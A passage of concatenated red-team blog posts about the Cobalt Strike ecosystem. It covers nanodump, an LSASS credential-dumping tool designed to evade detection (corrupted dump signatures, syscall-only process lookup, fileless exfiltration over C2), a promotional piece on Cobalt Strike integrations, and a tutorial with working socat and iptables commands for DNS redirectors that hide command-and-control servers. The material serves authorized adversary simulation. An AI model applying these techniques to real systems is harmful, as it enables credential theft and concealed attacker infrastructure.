In fact, we were able to ignore most of them and kept only those that are relevant to mimikatz, such as kerberos.dll and wdigest.dll. This decision effectively made the size of the dump a lot smaller. 

Memory64ListStream 

The actual memory pages of the LSASS process can be found in this stream. However, it takes up a lot of space, so reducing its size was critical to reduce the overall dump size. We decided to ignore any page that met any of the following conditions: 

  • Page wasn’t committed 
  • Page marked as mapped 
  • Page protection equals PAGE_NOACCESS 
  • Page marked as PAGE_GUARD 

Ignoring all these pages did not break the analysis of mimikatz, but did effectively reduce the size of the dump. 

Final Size 

By taking out all the non-vital information from the dump we managed to reduce the dump from roughly 50MB down to 10MB. 

Obfuscation 

As explained earlier, another goal was to achieve some level of obfuscation. Given that the creation of the minidump is done programmatically, we had full control of the dump and thus could implement any obfuscation that we chose. 

We opted to corrupt the “magic bytes” (or signature) of the minidump file format, which is a simple, yet effective approach.  

Minidumps start with the string “PMDM” in big endian. Changing these magic bytes would make it more difficult to figure out if a block of memory is a minidump, and since this is at the very start of the file, the binary blob wouldn’t look like a minidump, not even at creation time. 

This modification did break mimikatz and pypykatz. We created a small bash post-dump script to restore the original format once the dump is on the tester’s machine. 

PID of LSASS 

To dump LSASS, you typically need to know the PID of the LSASS process. The action of listing all the running processes could be seen as an abnormal or suspicious activity. Running tasklist or even calling CreateToolhelp32Snapshot might be detected by advance security solutions. 

We decided to use the NtGetNextProcess syscall to loop over all the processes in the system until we found a process that had ‘lsass.exe’ loaded. This was a valid method to find the LSASS process and avoided having to go through the usual steps. 

Avoiding API calls 

Reducing the number of API calls was important for obvious reasons: userland hooks. The only Windows API call that nanodump calls is LookupPrivilegeValueW, which is used to enable SeDebugPrivilege. This privilege should already be enabled in most cases, but feel free to remove this call if you want to be even stealthier. Besides that, everything is done using syscalls to avoid userland hooks. 

Syscalls Support 

To use syscalls, we used SysWhispers2 so, there was no need to re-compile nanodump for every new version of Windows. We had to make a few changes to the code to avoid using global variables given that Beacon Object Files (BOF) do not support them. We also used InlineWhispers to build nanodump on Linux using Mingw. 

Fileless download 

We also wanted to have the possibility of downloading the dump using Beacon’s C2 channel without touching the disk. However, it can be written to a file if need be. 

No Beacon? No Problem 

As explained earlier, we initially started this project as part of our Red Team practice, allowing us to conduct complex threat actions. Sometimes we don’t need to go as far as deploying Beacon on each compromised machine, so we added the possibility to use the .EXE version of nanodump. The one limitation that exists for the EXE version is that you cannot use the fileless download feature, given that it relies on Cobalt Strike’s C2 channel for it. 

Conclusion 

While it was challenging creating a SYSCALL based minidump, it was also critical for many scenarios. Additionally, creating a malleable module capable of feeding the great mimikatz is a powerful and flexible approach. The idea of modularizing a software solution has been out there for many years and this context is even more important to improve the success and future updates facing strong and dynamic detection tools. 
 

Do it Yourself 

If you’re interested in using nanodump, we’ve posted the code to our Github.  

Credits 

Thanks to: 

  • Skelsec for his amazing work with minidump and pypykatz. 
  • freefirex from CS-Situational-Awareness-BOF at Trustedsec for many cool tricks for BOFs  
  • jthuraisamy for SysWhispers2 

How to Extend Your Reach with Cobalt Strike 

 

We’re often asked, “what does Cobalt Strike do?” In simple terms, Cobalt Strike is a post-exploitation framework for adversary simulations and Red Teaming to help measure your security operations program and incident response capabilities. Cobalt Strike provides a post-exploitation agent, Beacon, and covert channels to emulate a quiet long-term embedded actor in a network.  

If we as security testers and red teamers continue to test in the same ways during each engagement, our audience (i.e., the defensive side) will not get much value out of the exercises. It’s important to be nimble. Cobalt Strike provides substantial flexibility for users to change their behavior and adapt just as an adversary does. For example, Malleable C2 is a Command and Control language that lets you modify memory and network indicators to control how Beacon looks and feels on a network.  

Cobalt Strike was designed to be multiplayer. One of its foundational features is its ability to support for multiple users to access multiple servers and share sessions. Enabling participation from users with different styles and skillsets further varies behavior to enrich engagements.   

While there are also numerous built-in capabilities, one of which we’ll discuss below, they are limited to what the team adds to the tool. One of our favorite features of Cobalt Strike is its user developed modules, through which many of the built-in limits are overcome. In fact, users are encouraged to extend its capabilities with complementary tools and scripts to tailor the engagements to best meet the organization’s needs. We wanted to highlight a few ways we’ve recently seen Cobalt Strike users doing just that to conduct effective assessments.   

Interoperability with Core Impact 

Contrary to many perceptions, Cobalt Strike is actually not a penetration testing tool. As we mentioned earlier, we identify as a tool for post-exploitation adversary simulations and Red Team operations. However, we have recently begun offering interoperability with Core Impact, which is a penetration testing tool with features that align well with those of Cobalt Strike.  

Core Impact is typically used for exploitation and lateral movement and validating the attack paths often associated with a penetration test. Used by both in-house teams as well as third-party services, Core Impact offers capabilities for remote, local, and client-side exploitation. Impact also uses post-exploitation agents, which, while they don’t have a cool name like “Beacon,” are versatile in both their deployment and capabilities, including chaining and pivoting.   

While a previous blog dives deeper into the particulars, to quickly summarize, the interoperability piece comes in the form of session passing between both platforms. Those with both tools can deploy Beacon from within Core Impact. Additionally, users can spawn an Impact agent from within Cobalt Strike. If you have Cobalt Strike and would like to learn more, we recommend requesting a trial of Core Impact to try it out. 

Integration with Outflank’s RedELK Tool 

RedELK is an open-source tool that has been described by its creators as a “Red Team’s SIEM.” This highly usable tool tracks and sends Red Teams alerts about the activities of a Blue Team by creating a centralized hub for all traffic logs from redirectors to be sent and enriched.  Gaining visibility into the Blue Team’s movements enables Red Teams to make judicious choices about their next steps. These insights help Red Teams create a better learning experience and ensure Blue Teams get the most out of their engagements. 

Additionally, it also centralizes and enriches all operational logs from teamservers in order to provide a searchable history of the operation, which could be particularly helpful for longer and larger engagements. This all sounds like an ideal integration for Cobalt Strike users, right? While the sub-header is a fairly large spoiler, it is nonetheless very exciting that RedELK does fully support the Cobalt Strike framework.  

Community Kit Extensions  

We can’t say enough good things about the user community. So many of you have written first-rate tools and scripts that have further escalated the power of Cobalt Strike—we feel like an artist’s muse and the art the community creates is amazing. However, many of these extensions are tricky to find, so not everyone has had the opportunity to take advantage and learn from them. In order to highlight all of this hard work, we’ve created the Community Kit. This central repository showcases projects from the user community to ensure that they’re more easily discovered by fellow  security professionals. 

We encourage you to check it out to see the fantastic work of your peers which can help take raise the level of your next security engagement and may even inspire you to create and submit your own. Check back regularly as new submissions are coming in frequently.  

A Dynamic Framework  

Cobalt Strike was intentionally built as an adaptable framework so that users could continually change their behavior in an engagement. However, this flexibility has also enabled both expected and unexpected growth of the tool itself. Planned additions like the interoperability with Core Impact allows users to benefit from session passing, while unanticipated extensions like those in the community kit are equally welcome, as they enable users to truly make the tool their own. Ultimately, we’re excited to see such dedication to this tool from all angles, as it motivates us all to keep advancing Cobalt Strike to the next level so users can keep increasing the value of every engagement.   

Want to learn more about Core Impact? 

Get information on other ways Core Impact and Cobalt Strike complement one another for comprehensive infrastructure protection. 

Simple DNS Redirectors for Cobalt Strike

 

This post, from Ernesto Alvarez Capandeguy of Core Security’s CoreLabs Research Team, describes techniques used for creating UDP redirectors for protecting Cobalt Strike team servers. This is one of the recommended mechanisms for hiding Cobalt Strike team servers and involves adding different points which a Beacon can contact for instructions when using the HTTP channel.

Unlike HTTP Beacons, DNS Beacons do not contact the team server directly, but use the DNS infrastructure for carrying messages. In theory, the team server should be referenced in the DNS records so that all queries for the Command and Control (C2) domain are delivered properly. This would mean exposing the team server to the Internet, which is not desirable.

Just as HTTP redirectors can be used to hide the team server from outside scrutiny, a DNS redirector can be used for the same thing. In the case of DNS, redirectors are just one part of the solution, as alternative domains are also necessary in case the original domain is taken down. We will not cover these aspects here, as we’ll be concentrating on the redirection part.

Redirecting TCP traffic is straightforward. There is a very delimited set of data that clearly defines what constitutes a network connection (or flow). The state is explicit and can be easily determined from the packet stream. There are several generic proxies (e.g. SOCAT) that can simply proxy TCP connections on the user space. Options for secure proxying of TCP connections are also available (stunnel and SSH port forwarding are two well-known examples).

The situation is radically different for UDP. This is due to a few factors:

  • UDP is packet oriented, while TCP is byte/connection oriented.
  • UDP is stateless and keeping track of UDP “connections” requires second guessing the “connection” state.
  • UDP is handled very differently from TCP in userland.

In a TCP proxy operation, a connection is clearly defined. This connection can transmit EOF messages, so the proxy would always be aware of the state of the connection and would unambiguously know when it should release the connection resources.

UDP is more challenging, since without a way of directly sensing the DNS transaction state, SOCAT cannot know when to release the connection resources.

Simple Redirector Construction

The obvious solution for building a DNS redirector would be to use a DNS server. There are several choices for these, with differing features. We won’t touch on these options in this article, but will instead focus on simple redirectors that can be installed on minimal Linux systems and have a very small footprint.

Our redirectors will be based on the concept of diverting a UDP flow from the redirector’s local port to the team server in a way that the team server has to send the response back to the redirector, which will relay it to the Beacon.

There are two ways of achieving this goal: piping ports together and NAT.

Port Piping

We are all familiar with the concept of piping from a network port. Anyone can do it using netcat or an equivalent tool. Anyone with experience with any of these tools will also know that redirecting UDP traffic is sometimes problematic. A DNS redirector also has these problems, but they can be kept bounded.

For these tests, we are going to use SOCAT, a UNIX tool used to connect multiple types of inputs and outputs together. This tool can do the same thing as netcat but is more versatile.

Naive SOCAT Redirector

Before we jump into the solution, we should try to see the problems. Let’s attempt a naive approach to a DNS channel redirector. We can execute a straight SOCAT, and launch a Beacon pointed to our redirector, which will be executing the following:

# socat udp4-listen:53 udp4:teamserver.example.net:53

The initial installation works, and we see the ghost Beacon in the team server. However, any further communication fails. Monitoring the DNS traffic, we see the following:

# tcpdump -l -n -s 5655 -i eth0  udp port 53
 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 5655 bytes
 
05:40:26.453966 IP 173.194.91.156.62931 > redirector.example.net.53: 55757% A? 7242b4ba.cobalt-domain.example.net. (51)
05:40:26.454317 IP redirector.example.net.56494 > teamserver.example.net.53: 55757% A? 7242b4ba.cobalt-domain.example.net. (51)
05:40:26.454593 IP teamserver.example.net.53 > redirector.example.net.56494: 55757- 1/0/0 A 0.0.0.0 (100)
05:40:26.454687 IP redirector.example.net.53 > 173.194.91.156.62931: 55757- 1/0/0 A 0.0.0.0 (100)
05:41:26.689753 IP 172.253.219.11.49854 > redirector.example.net.53: 56196% A? 7242b4ba.cobalt-domain.example.net. (51)
05:42:27.217514 IP 172.253.219.11.61868 > redirector.example.net.53: 28170% A? 7242b4ba.cobalt-domain.example.net. (51)
05:43:27.532055 IP 173.194.91.156.49467 > redirector.example.net.53: 59203% A? 7242b4ba.cobalt-domain.example.net. (51)
05:44:27.653780 IP 173.194.91.77.59444 > redirector.example.net.53: 14169% A? 7242b4ba.cobalt-domain.example.net. (51)
05:45:27.770012 IP 173.194.91.141.62374 > redirector.example.net.53: 52473% A? 7242b4ba.cobalt-domain.example.net. (51)
05:46:28.051530 IP 172.253.219.7.39179 > redirector.example.net.53: 26440% A? 7242b4ba.cobalt-domain.example.net. (51)
05:47:28.190316 IP 173.194.91.74.45768 > redirector.example.net.53: 41092% A? 7242b4ba.cobalt-domain.example.net. (51)

Well, the Beacon checked in fine, but after the first DNS request the pipeline stalls. This is because the UDP protocol is stateless. SOCAT never got the idea that the first transaction was over and is still waiting for data from the same source port, ignoring all the others.

This can easily be solved by telling SOCAT to fork for every packet it sees. Below we show our second attempt at doing a SOCAT redirector:

# socat udp4-listen:53,fork udp4:teamserver.example.net:53
 
# tcpdump -l -n -s 5655 -i eth0  udp port 53
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 5655 bytes
05:53:45.783953 IP 173.194.91.129.48083 > redirector.example.net.53: 3962% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:53:45.784730 IP redirector.example.net.34472 > teamserver.example.net.53: 3962% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:53:45.784860 IP teamserver.example.net.53 > redirector.example.net.34472: 3962- 1/0/0 A 0.0.0.0 (100)
05:53:45.784954 IP redirector.example.net.53 > 173.194.91.129.48083: 3962- 1/0/0 A 0.0.0.0 (100)
05:54:00.847401 IP 173.194.91.83.48991 > redirector.example.net.53: 57475% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:00.848289 IP redirector.example.net.46902 > teamserver.example.net.53: 57475% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:00.848436 IP teamserver.example.net.53 > redirector.example.net.46902: 57475- 1/0/0 A 0.0.0.0 (100)
05:54:00.848541 IP redirector.example.net.53 > 173.194.91.83.48991: 57475- 1/0/0 A 0.0.0.0 (100)
05:54:15.917608 IP 173.194.91.156.35560 > redirector.example.net.53: 29854% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:15.918490 IP redirector.example.net.55342 > teamserver.example.net.53: 29854% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:15.918615 IP teamserver.example.net.53 > redirector.example.net.55342: 29854- 1/0/0 A 0.0.0.0 (100)
05:54:15.918719 IP redirector.example.net.53 > 173.194.91.156.35560: 29854- 1/0/0 A 0.0.0.0 (100)

Our Beacon is now alive and communicating well! SOCAT now waits for packets coming from new sources and forwards them to our team server. While everything appears to be normal, this is unfortunately not the case, as this redirector will not work for long. Let’s inspect the process table:

# ps 
  PID TTY          TIME CMD
5365 pts/0    00:00:00 sudo
5366 pts/0    00:00:00 bash
5864 pts/0    00:00:00 socat
5865 pts/0    00:00:00 socat
5866 pts/0    00:00:00 socat
5867 pts/0    00:00:00 socat
5868 pts/0    00:00:00 socat
5869 pts/0    00:00:00 socat
5870 pts/0    00:00:00 socat
5871 pts/0    00:00:00 socat
5883 pts/0    00:00:00 socat
5886 pts/0    00:00:00 socat
5888 pts/0    00:00:00 socat
5889 pts/0    00:00:00 socat
5890 pts/0    00:00:00 socat
5891 pts/0    00:00:00 socat
5903 pts/0    00:00:00 socat
5904 pts/0    00:00:00 socat
5908 pts/0    00:00:00 socat
5910 pts/0    00:00:00 socat
5911 pts/0    00:00:00 socat
5912 pts/0    00:00:00 socat
5913 pts/0    00:00:00 socat
5914 pts/0    00:00:00 socat
5923 pts/0    00:00:00 ps

This does not look good. SOCAT processes are piling up. Let’s stress the redirector a bit by requesting a few screenshots and then check the process table:

# ps | grep socat | wc -l
3489

If we weren’t root, we would have run out of process slots long ago. Even the superuser will eventually have problems with this redirector:

socat udp4-listen:53,fork udp4:teamserver.example.net:53
2021/03/02 06:09:57 socat[5864] E fork(): Resource temporarily unavailable

As expected, we ran out of resources. Worse, we still have several thousand SOCAT processes waiting. The problem was caused because SOCAT does not notice that a transaction has run out, and still keeps its resources allocated.

Working UDP SOCAT Redirector

Now that we understand the problems involving UDP proxying, we can build a functional solution. The trick is telling SOCAT to drop the connections as soon as the transaction is complete. Telling SOCAT to apply a 5 second inactivity timeout should do the trick:

 # socat -T 5 udp4-listen:53,fork udp4:teamserver.example.net:53

In the example above, we told SOCAT that if no data is seen for five seconds, it should close the socket and assume that no further communication is needed.

While five seconds is a reasonable default timeout, we can attempt to optimize this value. To fine tune the timeout, we should understand the problem we’re facing. A DNS request is sent to our reflector, which is relayed to the team server. Once the team server answers, the transaction is over.

This limits our timeout to something we can control: the round-trip time between the redirector and the team server, including the time needed to process the request. A reasonable value would be twice the RTT between the hosts, to have some safety margin. Since our test hosts are in the same LAN, a timeout of one second should be more than enough for our example.

Below we show the process usage for five and one second timeouts:

The graph shows that the number of SOCAT processes rises as soon as there is activity, but the timeout causes the number of active processes to reach a plateau and stay at a certain value, depending on the activity and the timeout.

Working SOCAT UDP/TCP Redirector

We now have a working redirector. We can also use SOCAT for UDP to TCP translation. For every UDP packet received, we can fork and open a TCP connection, sending the DNS data via TCP. It is very important not to recycle connections, because UDP is packet oriented while TCP is not. We should never put more than one packet within a TCP connection, because two packets might be joined or split. In theory, SOCAT might decide to split a DNS request in two UDP packets, but this does not happen in practice. You should know that there is always that risk when doing UDP to TCP translations.

We tell SOCAT to take traffic from port 53, and for each packet, to open a connection to port 9191/tcp on the team server. The timeout is set to one second, which might be a bit too low, considering that TCP is involved:

# socat -T 1 udp4-listen:53,fork tcp4:teamserver.example.net:9191

Since we’re encapsulating our data within TCP, we need to run the following in the team server:

# socat -T 10 tcp4-listen:9191,fork udp4:127.0.0.1:53

Let’s now try generating some traffic and see what happens.

The dip in the middle represents a lapse in activity. The quick timeout allows for fast recovery. Overall, it’s not bad, but we also need to see how many open connections we have.

The numbers are somewhat high because TCP requires a wait period when a connection is closed from the client side. This is needed in case some control messages are lost and should not be removed for the protocol to operate properly. This is not a problem, though, because the number of resources allocated reach an equilibrium. A few RTT after the activity goes down, the resource usage drops as well.

Once we have the translation capability, we can take advantage of it. With DNS over TCP connections, we can take advantage of other proxying utilities, like stunnel or SSH’s port forwarding, and attempt to hide the team server from public scrutiny. The team server can be kept in an isolated network, without being exposed to the Internet.

NAT Based Redirectors

Another possible solution involves NAT. The concept behind a NAT redirector is to apply two NAT operations to incoming packets. The packet must be redirected to the team server, but at the same time, the packet must also be translated so that it appears to come from the redirector.

Failing to apply the second operation will cause the team server to answer the DNS query itself. The response will be ignored, as it will come from a different DNS server.

For our NAT redirector, we use Linux’s IPTABLES.

IPTABLES Based Redirector

IPTABLES is also well suited for use as a redirector. The Linux kernel’s NAT system automatically keeps track of connection state, even for UDP traffic. The detection is based on timers and inactivity, but the system is well developed and very stable.

The advantage of IPTABLES redirectors is that they’re lightning fast, incredibly efficient, and robust. Unlike SOCAT redirectors, iptables cannot convert from one protocol to another as IPTABLES works by packet mangling.

To create a working redirector, two things need to happen at the same time. Once a DNS query reaches the redirector, it must be redirected to the team server. This requires a DNAT operation.

However, if DNAT is used alone the packet will be diverted without changing the source address. As we already explained, this is not a good result, so we’ll also need to execute a SNAT operation.

The decision for doing the double NAT needs to be taken before any of the operations take place, as the DNAT change in the PREROUTING rule will erase important information present in the packet (namely whether this packet is addressed to the redirector or not).

To execute both operations simultaneously, we call the MARK target in the PREROUTING chain, and match the packet using every parameter of interest. Once the packet is marked, we can apply all operations both in the PREROUTING and POSTROUTING chains, completely changing the packet.

One final detail is that IP forwarding must be enabled in the redirector, since all these operations count as a forward, even if the packet is sent through the same interface it came in.

In the end, there are four commands that need to be called:

#enable IP forwarding
echo "1" > /proc/sys/net/ipv4/ip_forward

#Mark incoming DNS packets with the tag 0x400
iptables -t nat -A PREROUTING -m state --state NEW --protocol udp --destination my.ip.address 
--destination-port 53 -j MARK --set-mark 0x400

#For every marked packet, apply a DNAT and a SNAT (in this case, a MASQUERADE)
iptables -t nat -A PREROUTING -m mark --mark 0x400 --protocol udp 
-j DNAT --to-destination teamserver.example.net:53
iptables -t nat -A POSTROUTING -m mark --mark 0x400 -j MASQUERADE

Evaluating the capabilities listed in the proc filesystem, we see that we have 65,536 entries in the translation table (proc/sys/net/netfilter/nf_conntrack_max), and 16,384 buckets (/proc/sys/net/netfilter/nf_conntrack_buckets). This indicates that even at peak capacity, the lookups should be quick. These are default values and can be easily changed by writing a new number to the file, if necessary.

The system keeps track of the traffic passing through the redirector, so no action is needed for returning packets since they are translated back automatically.

To evaluate the performance of the redirector, we can measure the number of active NAT entries and how this number changes as the system is loaded. To measure this, we can read /proc/sys/net/netfilter/nf_conntrack_count.

Our experiment starts with a Beacon signaling at 15 second intervals. The Beacon is then made to signal continuously, followed by a high activity period. Once this activity period is over, the Beacon is reconfigured to its initial value of 15 seconds between polls.

In the test above we can see that the number of occupied slots depends on the network activity. With just one Beacon polling at 15 second intervals, the amount of conntrack slots is less than 10. If we switch to no delay, the value quickly grows to about 500, depending on availability throughput. When heavy activity is requested, the connection states steadily rise to 2500 and plateaus at 2700. Once activity ceases, connection tracks decrease until around 90 seconds, at which point they are all expired and the value stabilizes below 10.

IPTABLES redirectors perform quite well with very modest resources, even with default settings. This is not surprising, given the nature of the Linux kernel. Redirectors like this one can easily be deployed on the smallest computers or cloud instances. IPTABLES redirectors, once set up, are pretty much foolproof.

Summary

In this article, we saw three different implementations of DNS Beacon redirectors. Though these implementations have different advantages and disadvantages,  they are ultimately all very usable.

The IPTABLES based redirector is the quickest with the smallest footprint, being included by default in the kernel, and needing just four commands.

The SOCAT based redirectors are similar, the main difference being whether traffic is converted to TCP or not. UDP redirectors are simplest, but TCP redirectors have an advantage in the sense that TCP connections are easier to encapsulate, which is an advantage in special cases, like when the traffic must be tunneled via SSH.

Resource usage Speed Versatility Ease of Use Stability
SOCAT TCP 0 ++ + 0
SOCAT UDP + + + ++ +
IPTABLES ++ ++ 0 ++ ++